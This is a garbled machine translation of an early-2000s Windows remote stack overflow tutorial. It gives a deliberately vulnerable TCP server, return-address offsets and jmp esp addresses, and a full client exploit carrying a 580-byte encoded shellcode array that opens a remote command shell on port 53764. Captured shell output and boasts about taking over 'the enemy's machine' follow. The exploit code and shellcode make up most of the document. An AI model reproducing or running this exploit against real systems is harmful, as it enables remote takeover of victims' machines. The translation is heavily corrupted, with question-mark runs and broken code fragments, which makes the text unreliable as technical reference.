Remote stack overflow under the Window system - "Battle"
?
Author: ipxodi (ipxodi@263.net)
?
???? The following is a problematic Internet service program:
/ ************************************************** *********************************** /
/ * ??? server.cpp by ipxodi ???
* /
?
#include
#include
Char buff [1024];
Void Overflow (Char * S, INT Size)
{
???? char s1 [50];
???? Printf ("Receive% D Bytes", size);
???? s [size] = 0;
???? STRCPY (S1, s);
}
?
int main ()
{
???? WSADATA WSA;
???? sucket listenfd;
???? int Rent;
????? char asd [2048];
?
???? WSAStartup (MakeWord (2, 2), & WSA);
?
???? listenfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
?
???? Struct SockAddr_in Server;
?
???? server.sin_family = af_INet;
???? server.sin_port = htons (3764);
???? server.sin_addr.s_addr = addr_any;
???? Ret = bind (listenfd, (sockaddr *) & Server, sizeof (server));
???? Ret = listen (listenfd, 2);
????
???? Int Iaddrsize = SizeOf (Server);
???? Socket ClientFD = Accept (Listenfd, (SockAddr *) & Server, & IadDRsize
???? Unsigned long lbytesread;
???? while (1) ??? {
???????????? lbytesread = RECV (Clientfd, BUFF, 1024, 0);
???????????? IF (lbytesread <= 0) ??? Break;
?
???????????? Overflow (BUFF, LBYTESREAD);
?
???????????? RET = Send (Clientfd, BUFF, LBYTESREAD, 0);
???????????? IF (RET <= 0) ??? Break;
?
????}
???? wsacleanup ();
???? Return 0;
}
/ ************************************************** *********************************** /
?
The function overflow has problems, is it seen?
?
Ok, now let's write overflow attack programs:
?
1) What should I do if I have an overflow (return) address?
(: Ah? Courses? Are you trying to try with the program last time? I can't read it, I don't have to use it?
: Hey, the old brother, the last time is the original code without the enemy, too lazy to see the compilation, will try,
Now that the original code is placed in front of you, don't you come out? )
?
Here is the overflow moment stack layout: memory bottom ????????????????????? Memory top
??????????? buffer ?????? EBP ??? RET??
<------ ?? [nnnnnnnnn] [n ??] [a ??] SSSS
?????? ^ & buffer
Stack top ?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
?
It can be seen that Baffer we open the 50, 32-bit system for four-bit alignment for arrays, so the actual buffer is
52, plus EBP accounts for 4 bytes, that is, 52 4 = 56, then RET is the 56th byte.
?
2) What is the address of loadLibrary and getProcadDress in Server?
Launch WDASM32, load server.exe
?
: 004028EC 68F0014200 ?????????????? push 004201F0
?
* Reference to: kernel32.loadlibrarya, ORD: 01C2H
?????????????????????????????????????
: 004028F1 FF15E8614200 ??????????? Call DWORD PTR [004261E8]
?
Ok, kernel32.LoadLibrarya (is the alias of LoadLibrary): 0x004261E8.
?
: 00402911 51 ????????????? Push ECX
?
* Reference to: kernel32.getProcaddress, Ord: 013eh
?????????????????????????????????????
: 00402912 FF15E4614200 ??????????? Call DWORD PTR [004261E4]
?
Ok, kernel32.GetProcaddress's entrance address: 0x004261E4.
?
These two addresses have 00, we can't be referenced directly in Shellcode, so the following workaround:
?? 0xbb, 0x99, 0xe8, 0x61, 0x42, ?? / * mov EBX, 004261E8H; (& loadLibrary) ?????????? * /
?? 0xc1, 0xeb, 0x08, ?????????????? * shr EBX, 08 ???????????????????? * /
as well as
?? 0xb3, 0xe4, ????????????????????? * MOV BL, E4 ??? & getProcaddr ????? * /
?
3) Write a client:
/ ************************************************** *********************************** /
/ * ??? client.cpp by ipxodi ???
* /
?
#include
#include
#define Win2000
?
#ifdef Win2000
#define jumpesp "/ x2a / xe3 / xe2 / x77"
#ENDIF
#ifdef Win98
#define jumpesp "/ xa3 / x95 / xf7 / xbf"
#ENDIF
?
UNSIGNED Char EIP [8] = Jumpesp;
UNSIGNED Char Sploit [580] = {
?? 0x90, 0x8b, 0xfc,
?? 0x33, 0xc0, 0x50, 0x59, 0xf2, 0xaf, 0x59, 0xb1, 0xc6, ?? 0x8b, 0xc7, 0x48, 0x80, 0x30, 0x99, 0xe2, 0xfa, 0x33, 0xf6, 0x96, 0xbb,
?? 0x99, 0xE8, 0x61, 0x42, 0xc1, 0xeb, 0x08, 0x56, 0xff, 0x13, 0x8b, 0xD0,
?? 0xfc, 0x33, 0xc9, 0xb1, 0x0b, 0x49, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75,
?? 0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe4, 0xff, 0x13, 0xAb, 0x59, 0x5a,
?? 0xe2, 0xec, 0x32, 0xc0, 0xAc, 0x84, 0xc0, 0x75, 0xf9, 0xb3, 0xe8, 0x56,
0xff, 0x13, 0x8b, 0xd0, 0xfc, 0x33, 0xc9, 0xb1, 0x06, 0x32, 0xc0, 0xac,
?? 0x84, 0xc0, 0x75, 0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe4, 0xff, 0x13,
?? 0xAb, 0x59, 0x5a, 0xe2, 0xec, 0x83, 0xc6, 0x05, 0x33, 0xc0, 0x50, 0x40,
?? 0x50, 0x40, 0x50, 0xff, 0x57, 0xe8, 0x93, 0x6a, 0x10, 0x56, 0x53, 0xff,
?? 0x57, 0xec, 0x6a, 0x02, 0x53, 0xff, 0x57, 0xf0, 0x33, 0xc0, 0x57, 0x50,
?? 0xB0, 0x0c, 0xAb, 0x58, 0xAb, 0x40, 0xAb, 0x5f, 0x48, 0x50, 0x57, 0x56,
?? 0xAD, 0x56, 0xf, 0x57, 0xc0, 0x48, 0x50, 0x57, 0xAD, 0x56, 0xAD, 0x56,
0xff, 0x57, 0xc0, 0x48, 0xB0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,
?? 0x33, 0xc0, 0x8b, 0x46, 0xf4, 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,
?? 0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,
?? 0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,
?? 0x50, 0xAD, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,
0xff, 0x57, 0xcc, 0xf, 0x76, 0xfc, 0xff, 0x57, 0xcc, 0x48, 0x50, 0x50,
?? 0x53, 0xff, 0x57, 0xf4, 0x8b, 0xd8, 0x33, 0xc0, 0xb4, 0x04, 0x50, 0xc1,
?? 0xe8, 0x04, 0x50, 0xff, 0x57, 0xD4, 0x8b, 0xf0, 0x33, 0xc0, 0x8b, 0xc8,
?? 0xb5, 0x04, 0x50, 0x50, 0x57, 0x51, 0x56, 0xff, 0x77, 0xa8, 0xff, 0x57,
?? 0xD0, 0x83, 0x3f, 0x01, 0x7c, 0x22, 0x33, 0xc0, 0x50, 0x57, 0xff, 0x37,
?? 0x56, 0xff, 0x77, 0xa8, 0x0b, 0x57, 0x74, 0x2f, 0x33, ?? 0xc0, 0x50, 0xff, 0x37, 0x56, 0x53, 0x, 0x57, 0xf8, 0x6a, 0x50, 0xFF,
?? 0x57, 0xE0, 0xeb, 0xc8, 0x33, 0xc0, 0x50, 0xb4, 0x04, 0x50, 0x56, 0x53,
?? 0xff, 0x57, 0xfc, 0x57, 0x33, 0xc9, 0x51, 0x50, 0x56, 0xff, 0x77, 0xac,
0xff, 0x57, 0xD8, 0x6a, 0x50, 0xff, 0x57, 0xe0, 0xeb, 0xaa, 0x50, 0xff,
?? 0x57, 0xe4, 0x90, 0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xAb, 0x99,
?? 0xDa, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
?? 0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xD0, 0xF7, 0xFF,
?? 0xf6, 0xD8, 0x99, 0xDa, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
?? 0xfa, 0xfc, 0xea, 0xea, 0xD8, 0x99, 0xDa, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
?? 0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
?? 0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
?? 0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
?? 0xfc, 0xDF, 0xF0, 0xF5, 0xFC, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
?? 0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
?? 0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xD6,
?? 0xDa, 0xD2, 0xAA, 0xAb, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
?? 0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
?? 0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
?? 0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
?? 0x4b, 0x9d, // port = 53764
?? 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
?? 0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xFF, 0xFF, 0xFF,
?? 0x0d, 0x0a};
int main ()
{
???? WSADATA WSA;
???? suke sockfd;
???????????????????????????????????????????????????????????????????
?
???? WSAStartup (MakeWord (2, 2), & WSA);?
???? sockfd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
?
???? Struct SockAddr_in Server;
?
???? server.sin_family = af_INet;
???? server.sin_port = htons (3764);
???? server.sin_addr.s_addr = inet_addr ("127.0.0.1");
?
???? Connect (SockFD, Struct SockAddr *) & Server, SIZEOF (Server);
???? for (int i = 0; i <56; buff [i ] = 0x90);
???? STRCPY (BUFF 56, (char *) EIP);
???? Strcpy (buff 60, (char *) sploit);
???? SBO = BUFF;
???? Send (SOCKFD, SBO, 56 4 560, 0);
?
???? CloseSocket (SOCKFD);
???? wsacleanup ();
???? Return 1;
?
}
/ ************************************************** *********************************** /
Run Server, then run the client. After telnet localhost 53764, what did you see?
?
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1998 Microsoft Corp.
?
D: / myProjects / Server> DIR
DIR
The volume in the driver D has no label.
The serial number of the volume is 3C2F-72BB
?
D: / myprojects / server directory
?
2000-04-26? 17: 52 ???????
?
??????????.
2000-04-26? 17: 52 ???????
?????????? ..
2000-04-25? 11: 17 ???????
?????????? debug
2000-04-23? 20: 23 ????????????????? 3,288 Server.001
2000-04-25? 11: 16 ?????????????????? 926 Server.cpp
2000-04-25? 10: 33 ???????????????? 3,325 Server.dsp
2000-04-25? 10: 33 ?????????????????? 535 Server.dsw
2000-04-26? 17: 52 ??????????????? 41, 984 Server.ncb
2000-04-26? 17: 52 ??????????????? 49,664 Server.opt
2000-04-25? 11: 24 ?????????????????? 509 Server.plg
??????????????? 7 files ??????? 100,231 bytes
??????????????? 3 directory? 8,688,173,056 available bytes
?
D: / myProjects / Server>
?
Oh, I'm big.
?
?
----postscript
Everyone can know, you can know that this is a universal remote overflow shellcode under Windows.
With this shellcode, a little change, we can write other remote overflow programs.
Remote control of programs for any known presence buffer overflow problem.
?
In fact, in order to find overflow vulnerabilities, you must go deep into the enemy's program code and find him.
There is a problem code. This can be set out in detail here.
Cracker under Windows, your crack tracking technology will be in this field
Get the biggest utilization. I estimate that in the near future, there will be a lot of Cracker, publish a series.
Windows buffer overflow vulnerability.
?
The above is shown, just an experimental Server program, in fact,
We have completed the Implementation of the OICQ Remote Overflow and ported in IISHACK Chinese NT.
?
When I telnet Victim 53764, the enemy's machine was removed, and when his autoexec.001,
It's really everything in master. I think in my heart is:
The remote overflow era of Windows NT / 2000 started! We don't need Trojans again!
?
Because the above procedures are too strong, I will not announce the original code, I hope
If someone wrote a remote overflow program based on my shellcode, please inform the software supplier first.
After waiting for the PATCH, then publish your overflow programs.
?
Because, the purpose of discovering vulnerabilities is not destroyed, but in order to eliminate vulnerabilities, improve safety.
?
----bibliography:
0) IPXODI "Stack overflow under the Window system" NSFOCUSMagzine 20003.
1) The classic article on the Phrack Magzine55 of Dark Spyrit Aka Barnaby Jack.
2) Backend's "Windows 2000 Buffer Overflow" nsfocusmagzine 20004.
3) "Windows Network Programming Technology" ANTHORY JONES, JIM OHLUND. (Mechanical Edition Jingjing Translation)
?
---- Acknowledgment
Many people who want to thank:
Dark Spyrit, pay tribute to you for your genius and selflessness.
Thanks to the Great Backend, Yuange, Zer9, for your research results and selfless help,
Of course, there is a TT, Deepin, a Green All, gives you a help in attacking practice.
Thanks to all people who help and inspire me.